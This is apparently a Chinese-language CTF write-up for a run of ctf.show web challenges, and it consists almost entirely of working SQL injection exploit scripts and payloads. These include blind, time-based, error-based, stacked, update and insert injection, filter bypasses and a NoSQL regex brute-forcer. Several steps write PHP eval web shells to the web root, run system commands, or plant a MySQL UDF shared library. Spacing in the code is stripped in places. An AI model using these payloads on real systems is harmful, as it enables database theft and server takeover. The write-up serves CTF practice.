defread(): whileTrue: r = session.get(url2) if'flag'in r.text: print(r.text) threads = [threading.Thread(target=write), threading.Thread(target=read)] for t in threads: t.start()
#encoding: utf-8 import os import requests import re import string import threading import urllib
letters = string.ascii_letters + string.digits + '-}{_' url = 'http://2e4133ff-13ae-4038-9b6e-ce069aa25427.challenge.ctf.show/select-waf.php' stop = False flag = 'ctfshow{' hex_flag = '0x63746673686F777B' while stop isFalse: for c in letters: payload = hex_flag + hex(ord(c))[2:] data = { "tableName":f"ctfshow_user group by pass having pass regexp({payload})" } response = requests.post(url=url, data=data) if'user_count = 1;'in response.text: if c == '}': stop = True hex_flag = payload flag += c print(flag) break
web185-186
不能用数字了,考虑用char和true构造出字母,然后用concat拼接起来
#encoding: utf-8 import os import requests import re import string import threading import urllib
# 我这里使用了很多个true拼接,但实际上也可以一位一位的,比如99可以用'9'和'9'拼起来 defstr_convert(s:str) -> str: ss = 'concat(' for c in s: ss += f'char(true' + '+true'*(ord(c)-1) + '),' return ss[:-1]+')'
while stop isFalse: for c in letters: payload = str_convert(flag+c) data = { "tableName":f"ctfshow_user group by pass having pass regexp({payload})" } response = requests.post(url=url, data=data) if'user_count = 1;'in response.text: if c == '}': stop = True flag += c print(flag) break
web187
查询语句
//拼接sql语句查找指定ID用户 $sql = "select count(*) from ctfshow_user where username = '$username' and password= '$password'";
flag = '' for i inrange(1,60): l = 32 r = 127 while l < r: mid = (l+r)>>1 if(mid==l): flag += chr(mid) print(flag) break data = { # 数据库 ctfshow_web # "username":f"admin'and (ascii(substr((select database()),{i},1))<{mid})#",
flag = '' for i inrange(1,60): l = 32 r = 127 while l < r: mid = (l+r)>>1 if(mid==l): flag += chr(mid) print(flag) break data = { # 数据库 ctfshow_web # "username":f"admin'and (ord(substr((select database()),{i},1))<{mid})#",
flag = '' for i inrange(1,50): for j inrange(32,128): data = { # 数据库 ctfshow_web # "username":f"admin'and if(substr((select database()),{i},1)='{chr(j)}',1,0)#",
flag = '' for i inrange(1,46): for j inrange(32,128): data = { # 数据库 ctfshow_web # "username":f"admin'and if(left((select database()),{i})='{flag+chr(j)}',1,0)#",
flag = '' for i inrange(1,46): for j inrange(32,128): data = { # 数据库 ctfshow_web # "username":f"admin'and if(lpad((select database()),{i},'')='{flag+chr(j)}',1,0)#",
""" Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """
from lib.core.compat import xrange from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
defdependencies(): pass
deftamper(payload, **kwargs): """ Replaces all occurrences of operator equal (' ') with '%09' counterpart Tested against: * MySQL 4, 5.0 and 5.5 Notes: * Useful to bypass weak and bespoke web application firewalls that filter the equal character ('=') * The LIKE operator is SQL standard. Hence, this tamper script should work against all (?) databases >>> tamper('SELECT * FROM users WHERE id=1') 'SELECT%09*%09FROM%09users%09WHERE%09id=1' """
flag = '' for i inrange(1,60): l = 32 r = 127 while l < r: mid = (l+r)>>1 if(mid==l): flag += chr(mid) print(flag) break data = { # 数据库 ctfshow_web # "ip":f"if((ascii(substr((select database()),{i},1))<{mid}),sleep(3),1)",
# 表名 ctfshow_flagx,ctfshow_info # "ip":f"if((ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema=database()),{i},1))<{mid}),sleep(3),1)", # 列名 id,flaga,info # "ip":f"if((ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='ctfshow_flagx'),{i},1))<{mid}),sleep(3),1)", # ctfshow{0c212089-3b00-4cd9-b24f-2c2ab51a9674} "ip":f"if((ascii(substr((select group_concat(flaga)from ctfshow_flagx),{i},1))<{mid}),sleep(3),1)", "debug": "0" } try: response = requests.post(url=url, data=data, timeout=2) l = mid except: r = mid
web215
多了引号包裹
select id from ctfshow_info where ip = '127.0.0.1';
还是二分时间盲注
#encoding: utf-8 import os import requests import re import string import threading import urllib
flag = '' for i inrange(1,60): l = 32 r = 127 while l < r: mid = (l+r)>>1 if(mid==l): flag += chr(mid) print(flag) break data = { # 数据库 ctfshow_web # "ip":f"'||if((ascii(substr((select database()),{i},1))<{mid}),sleep(3),1)#",
# 表名 ctfshow_flagxc,ctfshow_info # "ip":f"'||if((ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema=database()),{i},1))<{mid}),sleep(3),1)#", # 列名 id,flagaa,info # "ip":f"'||if((ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='ctfshow_flagxc'),{i},1))<{mid}),sleep(3),1)#", # ctfshow{ddf21244-bda1-4631-8272-8e5fc47275a5} "ip":f"'||if((ascii(substr((select group_concat(flagaa)from ctfshow_flagxc),{i},1))<{mid}),sleep(3),1)#", "debug": "0" } try: response = requests.post(url=url, data=data, timeout=2) l = mid except: r = mid
web216
增加了base64
select id from ctfshow_info where ip = from_base64(127.0.0.1);
用括号闭合就好
#encoding: utf-8 import os import requests import re import string import threading import urllib
flag = '' for i inrange(1,60): l = 32 r = 127 while l < r: mid = (l+r)>>1 if(mid==l): flag += chr(mid) print(flag) break data = { # 数据库 ctfshow_web # "ip":f"0)||if((ascii(substr((select database()),{i},1))<{mid}),sleep(3),1)#",
# 表名 ctfshow_flagxcc,ctfshow_info # "ip":f"0)||if((ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema=database()),{i},1))<{mid}),sleep(3),1)#", # 列名 id,flagaac,info # "ip":f"0)||if((ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='ctfshow_flagxcc'),{i},1))<{mid}),sleep(3),1)#", # ctfshow{3c215bb4-3aab-4149-96fb-ea6c2bbdf49d} "ip":f"0)||if((ascii(substr((select group_concat(flagaac)from ctfshow_flagxcc),{i},1))<{mid}),sleep(3),1)#", "debug": "0" } try: response = requests.post(url=url, data=data, timeout=2) l = mid except: r = mid
flag = '' for i inrange(1,60): l = 32 r = 127 while l < r: mid = (l+r)>>1 if(mid==l): flag += chr(mid) print(flag) break data = { # 数据库 ctfshow_web # "ip":f"0)||if((ascii(substr((select database()),{i},1))<{mid}),benchmark(50000000,'evo1'),1)#",
# 表名 ctfshow_flagxccb,ctfshow_info # "ip":f"0)||if((ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema=database()),{i},1))<{mid}),benchmark(150000000,'evo1'),1)#", # 列名 id,flagaabc,info # "ip":f"0)||if((ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='ctfshow_flagxccb'),{i},1))<{mid}),benchmark(150000000,'evo1'),1)#", # ctfshow{c8faf32a-fe53-41f0-a7df-560a0971f034} "ip":f"0)||if((ascii(substr((select group_concat(flagaabc)from ctfshow_flagxccb),{i},1))<{mid}),benchmark(150000000,'evo1'),1)#", "debug": "0" } time.sleep(0.7) try: response = requests.post(url=url, data=data, timeout=2) l = mid except: r = mid
flag = '' for i inrange(1,60): l = 32 r = 127 while l < r: mid = (l+r)>>1 if(mid==l): flag += chr(mid) print(flag) break data = { # 数据库 ctfshow_web # "ip":f"0)||if((ascii(substr((select database()),{i},1))<{mid}),(SELECT count(*) FROM(( SELECT table_name FROM information_schema.COLUMNS ) a,( SELECT table_name FROM information_schema.COLUMNS ) b,( SELECT table_name FROM information_schema.COLUMNS limit 1,3 ) c) LIMIT 1),1)#",
# 表名 ctfshow_flagxc,ctfshow_info # "ip":f"0)||if((ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema=database()),{i},1))<{mid}),(SELECT count(*) FROM(( SELECT table_name FROM information_schema.COLUMNS ) a,( SELECT table_name FROM information_schema.COLUMNS ) b,( SELECT table_name FROM information_schema.COLUMNS limit 1,3 ) c) LIMIT 1),1)#", # 列名 id,flagaac,info # "ip":f"0)||if((ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='ctfshow_flagxc'),{i},1))<{mid}),(SELECT count(*) FROM(( SELECT table_name FROM information_schema.COLUMNS ) a,( SELECT table_name FROM information_schema.COLUMNS ) b,( SELECT table_name FROM information_schema.COLUMNS limit 1,3 ) c) LIMIT 1),1)#", # ctfshow{5456333f-bac9-48eb-b262-4e1eaf38fe0a} "ip":f"0)||if((ascii(substr((select group_concat(flagaac)from ctfshow_flagxc),{i},1))<{mid}),(SELECT count(*) FROM(( SELECT table_name FROM information_schema.COLUMNS ) a,( SELECT table_name FROM information_schema.COLUMNS ) b,( SELECT table_name FROM information_schema.COLUMNS limit 1,3 ) c) LIMIT 1),1)#", "debug": "0" } time.sleep(0.5) try: response = requests.post(url=url, data=data, timeout=1) l = mid except: r = mid
flag = '' for i inrange(1,60): l = 32 r = 127 while l < r: mid = (l+r)>>1 if(mid==l): flag += chr(mid) print(flag) break data = { # 数据库 ctfshow_web # "ip":f"0)||if((ascii(substr((select database()),{i},1))<{mid}),(SELECT count(*) FROM(( SELECT table_name FROM information_schema.COLUMNS ) a,( SELECT table_name FROM information_schema.COLUMNS ) b,( SELECT table_name FROM information_schema.COLUMNS limit 1,3 ) c) LIMIT 1),1)#",
# 表名 ctfshow_flagxca,ctfshow_info # "ip":f"0)||if((ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema=database()),{i},1))<{mid}),(SELECT count(*) FROM(( SELECT table_name FROM information_schema.COLUMNS ) a,( SELECT table_name FROM information_schema.COLUMNS ) b,( SELECT table_name FROM information_schema.COLUMNS limit 1,3 ) c) LIMIT 1),1)#", # 列名 id,flagaabc,info # "ip":f"0)||if((ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='ctfshow_flagxca'),{i},1))<{mid}),(SELECT count(*) FROM(( SELECT table_name FROM information_schema.COLUMNS ) a,( SELECT table_name FROM information_schema.COLUMNS ) b,( SELECT table_name FROM information_schema.COLUMNS limit 1,3 ) c) LIMIT 1),1)#", # ctfshow{3adf6005-ec81-4a42-8e06-7adbb42c6c11} "ip":f"0)||if((ascii(substr((select group_concat(flagaabc)from ctfshow_flagxca),{i},1))<{mid}),(SELECT count(*) FROM(( SELECT table_name FROM information_schema.COLUMNS ) a,( SELECT table_name FROM information_schema.COLUMNS ) b,( SELECT table_name FROM information_schema.COLUMNS limit 1,3 ) c) LIMIT 1),1)#", "debug": "0" } time.sleep(0.5) try: response = requests.post(url=url, data=data, timeout=1) l = mid except: r = mid
flag = '' for i inrange(1,60): for j in letters: data = { # 数据库 ctfshow_web # "ip":f"0)||if((left((select database()),{i})='{flag+j}'),(SELECT count(*) FROM(( SELECT table_name FROM information_schema.COLUMNS ) a,( SELECT table_name FROM information_schema.COLUMNS ) b,( SELECT table_name FROM information_schema.COLUMNS limit 1,3 ) c) LIMIT 1),1)#",
# 表名 ctfshow_flagxcac # "ip":f"0)||if((left((select table_name from information_schema.tables where table_schema=database() limit 0,1),{i})='{flag+j}'),(SELECT count(*) FROM(( SELECT table_name FROM information_schema.COLUMNS ) a,( SELECT table_name FROM information_schema.COLUMNS ) b,( SELECT table_name FROM information_schema.COLUMNS limit 1,3 ) c) LIMIT 1),1)#", # 列名 flagaabcc # "ip":f"0)||if((left((select column_name from information_schema.columns where table_name='ctfshow_flagxcac' limit 1,1),{i})='{flag+j}'),(SELECT count(*) FROM(( SELECT table_name FROM information_schema.COLUMNS ) a,( SELECT table_name FROM information_schema.COLUMNS ) b,( SELECT table_name FROM information_schema.COLUMNS limit 1,3 ) c) LIMIT 1),1)#", # ctfshow{8e25fbd7-907b-44f6-a6b3-f350261adcce} "ip":f"0)||if((left((select flagaabcc from ctfshow_flagxcac limit 0,1),{i})='{flag+j}'),(SELECT count(*) FROM(( SELECT table_name FROM information_schema.COLUMNS ) a,( SELECT table_name FROM information_schema.COLUMNS ) b,( SELECT table_name FROM information_schema.COLUMNS limit 1,3 ) c) LIMIT 1),1)#", "debug": "0" } time.sleep(0.5) try: response = requests.post(url=url, data=data, timeout=1) except: flag += j print(flag) break
#encoding: utf-8 import os import requests import re import string import threading import time import urllib
defdiv(num): if num < 10: returnf"ascii('%0{num}')" elif num <100: returnf"concat(ascii('%0{str(num)[0]}'),ascii('%0{str(num)[1]}'))" else: returnf"concat(ascii('%0{str(num)[0]}'),ascii('%0{str(num)[1]}'),ascii('%0{str(num)[2]}'))"
flag = '' for i inrange(1,60): l = 32 r = 127 while l < r: mid = (l+r)>>1 if(mid==l): flag += chr(mid) print(flag) break #数据库 ctfshow_web # payload = f"?u=if((ascii(substr((select database()),{div(i)},true))<{div(mid)}),username,false)&page=1&limit=10"
#表名 ctfshow_flagas,ctfshow_user # payload = f"?u=if((ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema=database()),{div(i)},true))<{div(mid)}),username,false)&page=1&limit=10"
#列名 id,flagasabc,info # payload = f"?u=if((ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='ctfshow_flagas'),{div(i)},true))<{div(mid)}),username,false)&page=1&limit=10"
if(preg_match("/image|png|bmap|jpg|jpeg|application|text|audio|video/i",$filetype)){ die("file type error"); }
注入点在这里
$sql = "INSERT INTO file(filename,filepath,filetype) VALUES ('".$filename."','".$filepath."','".$filetype."');";
我们的语句放进去后会闭合前面的括号,然后堆叠注入写文件
INSERT INTO file(filename,filepath,filetype) VALUES ('filename','filepath','');select 0x3c3f3d60245f4745545b315d603f3e into outfile '/var/www/html/1.php';--+');
web225
查询语句
//分页查询 $sql = "select id,username,pass from ctfshow_user where username = '{$username}';";
# flagas /api/?username=1';show columns from ctfshow_flagasa;&page=1&limit=10
/api/?username=1';HANDLER ctfshow_flagasa OPEN as aaa;HANDLER aaa READ FIRST;&page=1&limit=10 {"code":0,"msg":"\u67e5\u8be2\u6210\u529f","count":1,"data":[{"id":"1","flagas":"ctfshow{bc3f1bc6-6ec5-4590-9362-f7610702c891}","info":"you get it"}]}
方法二 预处理
# ctfshow_web /api/?username=1';PREPARE evo1 from concat('s','elect', ' database()');EXECUTE evo1;&page=1&limit=10
/api/?username=1';PREPARE evo1 from concat('s','elect', ' flagas from ctfshow_flagasa');EXECUTE evo1;&page=1&limit=10
/api/?username=1';PREPARE evo1 from concat(char(115,101,108,101,99,116), ' flagas from ctfshow_flagasa');EXECUTE evo1;&page=1&limit=10
web226
查询语句
//分页查询 $sql = "select id,username,pass from ctfshow_user where username = '{$username}';";
# select database() /api/?username=1';PREPARE evo1 from 0x73656c6563742064617461626173652829;EXECUTE evo1;#&page=1&limit=10
# show tables # ctfsh_ow_flagas /api/?username=1';PREPARE evo1 from 0x73686f77207461626c6573;EXECUTE evo1;#&page=1&limit=10
# select * from ctfsh_ow_flagas /api/?username=1';PREPARE evo1 from 0x73656c656374202a2066726f6d2063746673685f6f775f666c61676173;EXECUTE evo1;#&page=1&limit=10
{"code":0,"msg":"\u67e5\u8be2\u6210\u529f","count":1,"data":[{"id":"1","flagasb":"ctfshow{dc7176dd-fba9-4665-aebb-7f4c0d2c2cf7}","info":"you get it"}]}
web227
这道题用前面的方法找不到,传个🐎上去看看
# select '<?php eval($_POST[1]);?>' into outfile '/var/www/html/1.php' /api/?username=1';PREPARE evo1 from 0x73656c65637420273c3f706870206576616c28245f504f53545b315d293b3f3e2720696e746f206f757466696c6520272f7661722f7777772f68746d6c2f312e70687027;EXECUTE evo1;#&page=1&limit=10
连接数据库记得数据库类型要选MYSQLI,在ROUTINES发现getFlag方法
向右翻找在定义处可以找到flag
知道地方后其实也可以直接注入了
# select * from information_schema.routines /api/?username=1';PREPARE evo1 from 0x73656c656374202a2066726f6d20696e666f726d6174696f6e5f736368656d612e726f7574696e6573;EXECUTE evo1;#&page=1&limit=10
也可以直接调用getFlag
/api/?username=1';call getFlag;
web228-230
同web226
web231
查询语句
//分页查询 $sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";
update注入,记得改用post方法
# root@localhost password=1',username=user() where id=1#&username=1
# ctfshow_web password=1',username=database() where id=1#&username=1
# banlist,ctfshow_user,flaga password=1',username=(select group_concat(table_name) from information_schema.tables where table_schema=database()) where id=1#&username=1
# id,flagas,info password=1',username=(select group_concat(column_name) from information_schema.columns where table_name="flaga") where id=1#&username=1
# ctfshow{29f08a27-226c-4e94-9689-ea06e7c9cd83} password=1',username=(select flagas from flaga) where id=1#&username=1
web232
改成用')闭合即可,其他步骤同web231
web233
查询语句
//分页查询 $sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";
可以用\逃逸,会把第一个'注释掉,变成下面这种语句
update ctfshow_user set pass = '\' where username = ',username=(select database()) where id=1';
最终payload
# 数据库 ctfshow_web username=,username=(select database()) where id=1#&password=\
# 表名 banlist,ctfshow_user,flag233333 username=,username=(select group_concat(table_name)from information_schema.tables where table_schema=database()) where id=1#&password=\
# 列名 id,flagass233,info username=,username=(select group_concat(column_name)from information_schema.columns where table_name='flag233333') where id=1#&password=\
# ctfshow{55536d6e-1dc6-47dc-9a53-51b709ea4c64} username=,username=(select flagass233 from flag233333) where id=1#&password=\
也可以直接时间盲注
#encoding: utf-8 import requests import re import string import time
flag = '' for i inrange(1,60): l = 32 r = 127 while l < r: mid = (l+r)>>1 if(mid==l): flag += chr(mid) print(flag) break #数据库 ctfshow_web # payload = f"ascii(substr((select database()),{i},1))<{mid}"
#表名 banlist,ctfshow_user,flag233333 # payload = f"ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema=database()),{i},1))<{mid}" #列名 id,flagass233,info # payload = f"ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flag233333'),{i},1))<{mid}" # ctfshow{55536d6e-1dc6-47dc-9a53-51b709ea4c64} payload = f"ascii(substr((select group_concat(flagass233)from flag233333),{i},1))<{mid}" data = { "username": f"1' or if(({payload}),sleep(0.05),1)#", "password": f"1", } time.sleep(0.1) try: response = requests.post(url=url, data=data, timeout=0.9) l = mid except: r = mid
if flag[-1] == ' 'or flag[-1] == '}': break
web234
单引号被过滤了,直接用\逃逸就好(找列名哪里表名可以转16进制或者用"包裹)
# 数据库 ctfshow_web username=,username=(select database()) where id=1#&password=\
# 表名 banlist,ctfshow_user,flag23a username=,username=(select group_concat(table_name)from information_schema.tables where table_schema=database()) where id=1#&password=\
# 列名 id,flagass23s3,info username=,username=(select group_concat(column_name)from information_schema.columns where table_name=0x666C6167323361) where id=1#&password=\ username=,username=(select group_concat(column_name)from information_schema.columns where table_name="flag23a") where id=1#&password=\
# ctfshow{adc42c34-0200-452a-b04c-dc465c05ecb2} username=,username=(select flagass23s3 from flag23a) where id=1#&password=\
# 数据库 ctfshow_web username=,username=(select database()) where id=1#&password=\
# 表名 banlist,ctfshow_user,flag23a1,gtid_slave_pos username=,username=(select group_concat(table_name) from mysql.innodb_table_stats) where id=1#&password=\ username=,username=(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())
# ctfshow{8dc6b582-bb1f-4700-8a60-59a2c552877c} username=,username=(select `2` from(select 1,2,3 union select * from flag23a1 limit 1,1)a) where id=1#&password=\ username=,username=(select b from(select 1,2 as b,3 union select * from flag23a1 limit 1,1)a) where id=1#&password=\
web236
增加过滤了flag
# 数据库 ctfshow_web username=,username=(select database()) where id=1#&password=\
# 表名 banlist,ctfshow_user,flaga,gtid_slave_pos username=,username=(select group_concat(table_name) from mysql.innodb_table_stats) where id=1#&password=\ username=,username=(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())
# ctfshow{975ab439-77ff-42fd-87be-84a13f913594} username=,username=(select `2` from(select 1,2,3 union select * from flaga limit 1,1)a) where id=1#&password=\ username=,username=(select b from(select 1,2 as b,3 union select * from flaga limit 1,1)a) where id=1#&password=\ username=,username=(select to_base64(b) from(select 1,2 as b,3 union select * from flaga limit 1,1)a) where id=1#&password=\
web237
查询语句
//插入数据 $sql = "insert into ctfshow_user(username,pass) value('{$username}','{$password}');";
insert注入,闭合前面的'然后插入自己的数据
insert into ctfshow_user(username,pass) value('1',(select database());#','1');
# 表名 banlist,ctfshow_user,flag,gtid_slave_pos username=1',(select group_concat(table_name) from mysql.innodb_table_stats));#&password=1 # banlist,ctfshow_user,flag username=1',(select group_concat(table_name) from information_schema.tables where table_schema=database()));#&password=1
# 列名 id,flagass23s3,info username=1',(select group_concat(column_name) from information_schema.columns where table_name="flag"));#&password=1
# ctfshow{0cdc4293-2484-435d-9961-4f932090a6a2} username=1',(select b from(select 1,2 as b,3 union select * from flag limit 1,1)a));#&password=1 username=1',(select flagass23s3 from flag));#&password=1
for i in letters: for j in letters: for k in letters: for l in letters: for m in letters: table_name = 'flag' + i + j + k + l + m data = { "username": f"1',(select(flag)from({table_name})))#", "password": "1" } r_insert = requests.post(url=url_insert,data=data) r_query = requests.get(url=url_query) for i in r_query.json()['data']: if"ctfshow{"in i['pass']: print(i['pass']) sys.exit(0)
web241
时间盲注
#encoding: utf-8 import requests import re import string import time
flag = '' for i inrange(1,60): l = 32 r = 127 while l < r: mid = (l+r)>>1 if(mid==l): flag += chr(mid) print(flag) break #数据库 ctfshow_web # payload = f"ascii(substr((select database()),{i},1))<{mid}"
#表名 banlist,ctfshow_user,flag # payload = f"ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema=database()),{i},1))<{mid}" #列名 id,flag,info # payload = f"ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flag'),{i},1))<{mid}" # ctfshow{00a7ac5a-fbac-4e61-b847-ba84f4699af9} payload = f"ascii(substr((select group_concat(flag)from flag),{i},1))<{mid}" data = { "id": f"if(({payload}),sleep(0.05),1)#" } time.sleep(0.1) try: response = requests.post(url=url, data=data, timeout=0.9) l = mid except: r = mid
if flag[-1] == ' 'or flag[-1] == '}': break
web242
sql语句
//备份表 $sql = "select * from ctfshow_user into outfile '/var/www/html/dump/{$filename}';";
可以使用这3个语句,使查询出来的数据结尾都添加上自定义的内容
lines terminated by lines starting by fields terminated by
最终payload
filename=1.php' lines terminated by '<?php eval($_POST[1]);phpinfo();?>'#
然后访问/dump/1.php执行1=system("cat /flag.here");即可
web243
过滤了php,可以先上传.user.ini,然后上传图片🐎即可
filename=.user.ini' lines starting by 'auto_append_file="1.jpg";'#
传🐎
filename=1.jpg' lines starting by '<?=eval($_POST[1]);?>'#
然后访问/dump/index.php并执行1=system("cat /flag.here");
web244
sql语句
//备份表 $sql = "select id,username,pass from ctfshow_user where id = '".$id."' limit 1;";
# 表名 banlist,ctfshow_flag,ctfshow_us /api/?id=1'||updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)%23&page=1&limit=10
# 列名 id,flag,info /api/?id=1'||updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flag'),0x7e),1)%23&page=1&limit=10
# 长度有限制,注意分开取 # ctfshow{2295d52e-d13a-40c6-9361 1'||updatexml(1,concat(0x7e,(select group_concat(flag) from ctfshow_flag),0x7e),1)%23&page=1&limit=10 #-cdf390ded690} /api/?id=1'||updatexml(1,concat(0x7e,(select right(group_concat(flag),14) from ctfshow_flag),0x7e),1)%23&page=1&limit=10 # 拼接一下即可 ctfshow{2295d52e-d13a-40c6-9361-cdf390ded690}
# 表名 banlist,ctfshow_flagsa,ctfshow_ /api/?id=1'||extractvalue(0x0a,concat(0x0a,(select group_concat(table_name) from information_schema.tables where table_schema=database())))%23&page=1&limit=10
# 列名 id,flag1,info /api/?id=1'||extractvalue(0x0a,concat(0x0a,(select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagsa')))%23&page=1&limit=10
# 长度有限制,注意分开取 # ctfshow{3c98930a-4ff1-4074-bd56 /api/?id=1'||extractvalue(0x0a,concat(0x0a,(select group_concat(flag1) from ctfshow_flagsa)))%23&page=1&limit=10 # -98413a509601} /api/?id=1'||extractvalue(0x0a,concat(0x0a,(select right(group_concat(flag1),14) from ctfshow_flagsa)))%23&page=1&limit=10 # 拼接一下即可 ctfshow{3c98930a-4ff1-4074-bd56-98413a509601}
web246
在上一关基础上又过滤了extractvalue,使用floor报错注入
# 数据库 ctfshow_web /api/?id=1' union select 1,count(*),concat(0x3a,0x3a,(select database() limit 1,1),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a%23&page=1&limit=10
# 表名 ctfshow_flags /api/?id= 1' union select 1,count(*),concat(0x3a,0x3a,(select (table_name) from information_schema.tables where table_schema=database() limit 1,1),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a%23&page=1&limit=10
# 列名 flag2 /api/?id= 1' union select 1,count(*),concat(0x3a,0x3a,(select (column_name) from information_schema.columns where table_name='ctfshow_flags' limit 1,1),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a%23&page=1&limit=10
# ctfshow{2aac7541-6f66-4780-8a44-e8cfa45e1842} /api/?id= 1' union select 1,count(*),concat(0x3a,0x3a,(select flag2 from ctfshow_flags limit 0,1),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a%23&page=1&limit=10
web247
在上一关基础上又过滤了floor,使用其他数学函数
round ceil floor
换成ceil即可,注意这一次列名比较特殊,要用反引号包裹
# 数据库 ctfshow_web /api/?id=1' union select 1,count(*),concat(0x3a,0x3a,(select database() limit 1,1),0x3a,0x3a,ceil(rand(0)*2))a from information_schema.columns group by a%23&page=1&limit=10
# 表名 ctfshow_flagsa /api/?id= 1' union select 1,count(*),concat(0x3a,0x3a,(select (table_name) from information_schema.tables where table_schema=database() limit 1,1),0x3a,0x3a,ceil(rand(0)*2))a from information_schema.columns group by a%23&page=1&limit=10
# 列名 flag? /api/?id= 1' union select 1,count(*),concat(0x3a,0x3a,(select (column_name) from information_schema.columns where table_name='ctfshow_flagsa' limit 1,1),0x3a,0x3a,ceil(rand(0)*2))a from information_schema.columns group by a%23&page=1&limit=10
# ctfshow{f2cfa4cb-9474-422b-9869-1254c8381897} /api/?id= 1' union select 1,count(*),concat(0x3a,0x3a,(select `flag?` from ctfshow_flagsa limit 0,1),0x3a,0x3a,ceil(rand(0)*2))a from information_schema.columns group by a%23&page=1&limit=10
import requests url="http://7f4bb2eb-823a-4218-9b38-670163bf025e.challenge.ctf.show/api/" udf="" udfs=[] for i inrange(0,len(udf),5000): udfs.append(udf[i:i+5000]) #写入多个文件中 for i in udfs: url1=url+f"?id=1';SELECT '{i}' into dumpfile '/tmp/"+str(udfs.index(i))+".txt'%23" requests.get(url1)
#合并文件生成so文件 url2=url+"?id=1';SELECT unhex(concat(load_file('/tmp/0.txt'),load_file('/tmp/1.txt'),load_file('/tmp/2.txt'),load_file('/tmp/3.txt'))) into dumpfile '/usr/lib/mariadb/plugin/hack.so'%23" requests.get(url2)
flag = "ctfshow{" for i inrange(60): for j in letters: data = { "username[$ne]": f"1", "password[$regex]": f"^{flag+j}" } response = requests.post(url=url, data=data) ifr'\u767b\u9646\u6210\u529f'in response.text: flag += j print(flag) break if'}'in flag: print(flag) break # ctfshow{1839bec9-f8ee-49d4-af37-0a660031bd18}